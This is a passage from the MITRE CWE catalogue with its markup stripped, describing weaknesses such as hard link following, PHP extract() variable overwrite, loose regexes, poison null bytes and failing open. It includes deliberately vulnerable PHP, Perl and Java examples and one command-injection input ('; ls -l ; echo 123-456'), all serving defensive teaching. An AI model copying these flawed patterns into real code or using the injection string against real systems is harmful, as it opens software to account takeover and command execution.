- The software, when opening a file or directory, does not sufficiently account for when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files. - Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. /etc/passwd). When the process opens the file, the attacker can assume the privileges of that process. - - - - - - Resultant - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Architecture and Design - Separation of Privilege - - Follow the principle of least privilege when assigning access rights to entities in a software system. - Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. - - - - - - CVE-2001-1494 - Hard link attack, file overwrite; interesting because program checks against soft links - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1494 - - - CVE-2002-0793 - Hard link and possibly symbolic link following vulnerabilities in embedded operating system allow local users to overwrite arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0793 - - - CVE-2003-0578 - Server creates hard links and unlinks files as root, which allows local users to gain privileges by deleting and overwriting arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0578 - - - CVE-1999-0783 - Operating system allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0783 - - - CVE-2004-1603 - Web hosting manager follows hard links, which allows local users to read or modify arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1603 - - - CVE-2004-1901 - Package listing system allows local users to overwrite arbitrary files via a hard link attack on the lockfiles. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1901 - - - CVE-2005-0342 - The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0342 - - - CVE-2005-1111 - Hard link race condition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1111 - - - BUGTRAQ:20030203 ASA-0001 - OpenBSD chpass/chfn/chsh file content leak - http://www.securityfocus.com/archive/1/309962 - - - - - UNIX hard link - - - FIO05-C - Identify files using multiple file attributes - - - SFP18 - Link in resource name resolution - - - - - - - Under-studied. It is likely that programs that check for symbolic links could be vulnerable to hard links. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication. - This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. - - - - - - Primary - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - - - - - Architecture and Design - When prompting for a password change, force the user to provide the original password in addition to the new password. - - - Architecture and Design - Do not use "forgotten password" functionality. But if you must, ensure that you are only providing information to the actual user, e.g. by using an email address or challenge question that the legitimate user already provided in the past; do not allow the current user to change this identity information until the correct password has been provided. - - - - - This code changes a user's password. - - $user = $_GET['user'];$pass = $_GET['pass'];$checkpass = $_GET['checkpass'];if ($pass == $checkpass) {SetUserPassword($user, $pass);} - - While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. - - - - - CVE-2007-0681 - Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681 - - - CVE-2000-0944 - Web application password change utility doesn't check the original password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944 - - - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - SFP31 - Missing authentication - - - - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - - - The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables. - - For example, in PHP, extraction can be used to provide functionality similar to register_globals, a dangerous functionality that is frequently disabled in production systems. Calling extract() or import_request_variables() without the proper arguments could allow arbitrary global variables to be overwritten, including superglobals. - Similar functionality is possible in other interpreted languages, including custom languages. - - - - - - - - Primary - - - - - - - - Variable overwrite - - - - - Implementation - - - - - Integrity - Modify Application Data - An attacker could modify sensitive data or program variables. - - - - - Implementation - Input Validation - Use allowlists of variable names that can be extracted. - - - Implementation - Consider refactoring your code to avoid extraction routines altogether. - - - Implementation - In PHP, call extract() with options such as EXTR_SKIP and EXTR_PREFIX_ALL; call import_request_variables() with a prefix argument. Note that these capabilities are not present in all PHP versions. - - - - - This code uses the credentials sent in a POST request to login a user. - - - //Log user in, and set $isAdmin to true if user is an administrator - - function login($user,$pass){$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == "Admin"){$isAdmin = true;}} - $isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass)); - - The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value "isAdmin" equal to "true", thus gaining Admin privileges. - - - - - CVE-2006-7135 - extract issue enables file inclusion - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135 - - - CVE-2006-7079 - extract used for register_globals compatibility layer, enables path traversal - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079 - - - CVE-2007-0649 - extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649 - - - CVE-2006-6661 - extract() enables static code injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661 - - - CVE-2006-2828 - import_request_variables() buried in include files makes post-disclosure analysis confusing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828 - - - - - SFP24 - Tainted input to command - - - - Probably under-reported for PHP. Under-studied for other interpreted languages. - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities. - Such hooks can be used in defensive software that runs with privileges, such as anti-virus or firewall, which hooks kernel calls. When the arguments are not validated, they could be used to bypass the protection scheme or attack the product itself. - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Architecture and Design - Ensure that all arguments are verified, as defined by the API you are protecting. - - - Architecture and Design - Drop privileges before invoking such functions, if possible. - - - - - CVE-2007-0708 - DoS in firewall using standard Microsoft functions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0708 - - - CVE-2006-7160 - DoS in firewall using standard Microsoft functions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7160 - - - CVE-2007-1376 - function does not verify that its argument is the proper type, leading to arbitrary memory write - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1376 - - - CVE-2007-1220 - invalid syscall arguments bypass code execution limits - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1220 - - - CVE-2006-4541 - DoS in IDS via NULL argument - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4541 - - - - - SFP27 - Tainted input to environment - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Other_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Description - - Unvalidated Function Hook Arguments - - - - An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting. - This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control's behavior. - - - - - - - - Primary - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Architecture and Design - During development, do not mark it as safe for scripting. - - - System Configuration - After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer. - - - - - CVE-2007-0617 - control allows attackers to add malicious email addresses to bypass spam limits - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0617 - - - CVE-2007-0219 - web browser uses certain COM objects as ActiveX - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219 - - - CVE-2006-6510 - kiosk allows bypass to read files - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6510 - - - - - - - - - - It is suspected that this is under-reported. - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Observed_Example, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - - - The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers. - Case (2) is possible in the PHP preg_replace() function, and possibly in other languages when a user-controlled input is inserted into a string that is later parsed as a regular expression. - - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Implementation - The regular expression feature in some languages allows inputs to be quoted or escaped before insertion, such as \Q and \E in Perl. - - - - - CVE-2006-2059 - Executable regexp in PHP by inserting "e" modifier into first argument to preg_replace - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2059 - - - CVE-2005-3420 - Executable regexp in PHP by inserting "e" modifier into first argument to preg_replace - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3420 - - - CVE-2006-2878 - Complex curly syntax inserted into the replacement argument to PHP preg_replace(), which uses the "/e" modifier - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2878 - - - CVE-2006-2908 - Function allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908 - - - - - SFP24 - Tainted input to command - - - - Under-studied. The existing PHP reports are limited to highly skilled researchers, but there are few examples for other languages. It is suspected that this is under-reported for all languages. Usability factors might make it more prevalent in PHP, but this theory has not been investigated. - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Observed_Example - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The product uses a regular expression that does not sufficiently restrict the set of allowed values. - - This effectively causes the regexp to accept substrings that match the pattern, which produces a partial comparison to the target. In some cases, this can lead to other weaknesses. Common errors include: - - - not identifying the beginning and end of the target string - using wildcards instead of acceptable character ranges - others - - - - - - - - - - - - Primary - - - - - - - - - Implementation - This problem is frequently found when the regular expression is used in input validation or security features such as authentication. - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - When applicable, ensure that the regular expression marks beginning and ending string patterns, such as "/^string$/" for Perl. - - - - - The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers. - - $phone = GetPhoneNumber();if ($phone =~ /\d+-\d+/) { - # looks like it only has hyphens and digits - system("lookup-phone $phone");} - else {error("malformed number!");} - - An attacker could provide an argument such as: "; ls -l ; echo 123-456" This would pass the check, since "123-456" is sufficient to match the "\d+-\d+" portion of the regular expression. - - - - - CVE-2006-1895 - ".*" regexp leads to static code injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1895 - - - CVE-2002-2175 - insertion of username into regexp results in partial comparison, causing wrong database entry to be updated when one username is a substring of another. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2175 - - - CVE-2006-4527 - regexp intended to verify that all characters are legal, only checks that at least one is legal, enabling file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4527 - - - CVE-2005-1949 - Regexp for IP address isn't anchored at the end, allowing appending of shell metacharacters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949 - - - CVE-2002-2109 - Regexp isn't "anchored" to the beginning or end, which allows spoofed values that have trusted values as substrings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109 - - - CVE-2006-6511 - regexp in .htaccess file allows access of files whose names contain certain substrings - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6511 - - - CVE-2006-6629 - allow load of macro files whose names contain certain substrings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6629 - - - - - IDS08-J - Sanitize untrusted data passed to a regex - - - - - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Modes_of_Introduction, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Observed_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The product does not properly handle null bytes or NUL characters when passing data between different representations or components. - - A null byte (NUL character) can have different meanings across representations or languages. For example, it is a string terminator in standard C libraries, but Perl and PHP strings do not treat it as a terminator. When two representations are crossed - such as when Perl or PHP invokes underlying C functionality - this can produce an interaction error with unexpected results. Similar issues have been reported for ASP. Other interpreters written in C might also be affected. - The poison null byte is frequently useful in path traversal attacks by terminating hard-coded extensions that are added to a filename. It can play a role in regular expression processing in PHP. - - - - - - - - Primary - - - - - - - - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - Remove null bytes from all incoming strings. - - - - - CVE-2005-4155 - NUL byte bypasses PHP regular expression check - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155 - - - CVE-2005-3153 - inserting SQL after a NUL byte bypasses allowlist regexp, enabling SQL injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153 - - - - - - - - - Current usage of "poison null byte" is typically related to this C/Perl/PHP interaction error, but the original term in 1998 was applied to an off-by-one buffer overflow involving a null byte. - There are not many CVE examples, because the poison NULL byte is a design limitation, which typically is not included in CVE by itself. It is typically used as a facilitator manipulation to widen the scope of potential attacks against other vulnerabilities. - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Research_Gaps, Terminology_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Relationships - - - - - In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions. - The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions. - - - - - - - Primary - - - - - - - - Many interpreted languages support the use of a "$$varname" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as "variable variables." Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2). - - - - Dynamic evaluation - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Modify Application Data - Execute Unauthorized Code or Commands - An attacker could gain unauthorized access to internal program variables and execute arbitrary code. - - - - - Implementation - Refactoring - Refactor the code to avoid dynamic variable evaluation whenever possible. - - - Implementation - Input Validation - Use only allowlists of acceptable variable or function names. - - - Implementation - For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments. - - - - - CVE-2009-0422 - Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422 - - - CVE-2007-2431 - Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431 - - - CVE-2006-4904 - Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904 - - - CVE-2006-4019 - Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019 - - - - - - - - Under-studied, probably under-reported. Few researchers look for this issue; most public reports are for PHP, although other languages are affected. This issue is likely to grow in PHP as developers begin to implement functionality in place of register_globals. - - - - CWE Content Team - MITRE - 2007-05-07 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Background_Details, Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Common_Consequences, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses. - - There are multiple ways in which this weakness can be introduced, including: - - - the wrong variable or reference; - an incorrect number of arguments; - incorrect order of arguments; - wrong type of arguments; or - wrong value. - - - - - - - - - Primary - This is usually primary to other weaknesses, but it can be resultant if the function's API or function prototype changes. - - - - - - - - Implementation - - - - - Other - Access Control - Quality Degradation - Gain Privileges or Assume Identity - This weakness can cause unintended behavior and can lead to additional weaknesses such as allowing an attacker to gain unintended access to system resources. - - - - - Other - Since these bugs typically introduce incorrect behavior that is obvious to users, they are found quickly, unless they occur in rarely-tested code paths. Managing the correct number of arguments can be made more difficult in cases where format strings are used, or when variable numbers of arguments are supported. - - - - - Build and Compilation - Once found, these issues are easy to fix. Use code inspection tools and relevant compiler features to identify potential violations. Pay special attention to code that is not likely to be exercised heavily during QA. - - - Architecture and Design - Make sure your API's are stable before you use them in production code. - - - - - The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order. - - function authenticate($username, $password) { - - - // authenticate user - ... - } - authenticate($_POST['password'], $_POST['username']); - - - - This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit. - - sub ReportAuth {my ($username, $result, $fatal) = @_;PrintLog("auth: username=%s, result=%d", $username, $result);if (($result ne "success") && $fatal) {die "Failed!\n";}} - sub PrivilegedFunc{my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();} - - - - In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles. - - private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);} - private boolean void accessGranted(String resource, String[] userRoles) { - - - // grant or deny access based on user roles - ... - } - - - - - - CVE-2006-7049 - The method calls the functions with the wrong argument order, which allows remote attackers to bypass intended access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049 - - - - - DCL10-C - Maintain the contract between the writer and caller of variadic functions - - - EXP37-C - Call functions with the correct number and type of arguments - CWE More Abstract - - - DCL00-PL - Do not use subroutine prototypes - CWE More Abstract - - - EXP33-PL - Do not invoke a function in a context for which it is not defined - Imprecise - - - - - CWE Content Team - MITRE - 2007-05-07 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Detection_Factors, Other_Notes, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Detection_Factors, Relationships - - Incorrectly Specified Arguments - - - - When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions. - By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to "fail functional" to minimize administration and support costs, instead of "failing safe." - - - - - - - - Primary - - - - - - - - Failing Open - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - Intended access restrictions can be bypassed, which is often contradictory to what the product's administrator expects. - - - - - Architecture and Design - Subdivide and allocate resources and components so that a failure in one part does not affect the entire product. - - - - - Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used. - - - - - CVE-2007-5277 - The failure of connection attempts in a web browser resets DNS pin restrictions. An attacker can then bypass the same origin policy by rebinding a domain name to a different IP address. This was an attempt to "fail functional." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5277 - - - CVE-2006-4407 - Incorrect prioritization leads to the selection of a weaker cipher. Although it is not known whether this issue occurred in implementation or design, it is feasible that a poorly designed algorithm could be a factor. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407 - - - - - A7 - Improper Error Handling - CWE More Specific - - - - - - - - Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol). - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Research_Gaps - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Design Principle Violation: Not Failing Securely - Design Principle Violation: Not Failing Securely (aka 'Failing Open') - Not Failing Securely (aka 'Failing Open') - - - - The software uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used. - Security mechanisms should be as simple as possible. Complex security mechanisms may engender partial implementations and compatibility problems, with resulting mismatches in assumptions and implemented security. A corollary of this principle is that data specifications should be as simple as possible, 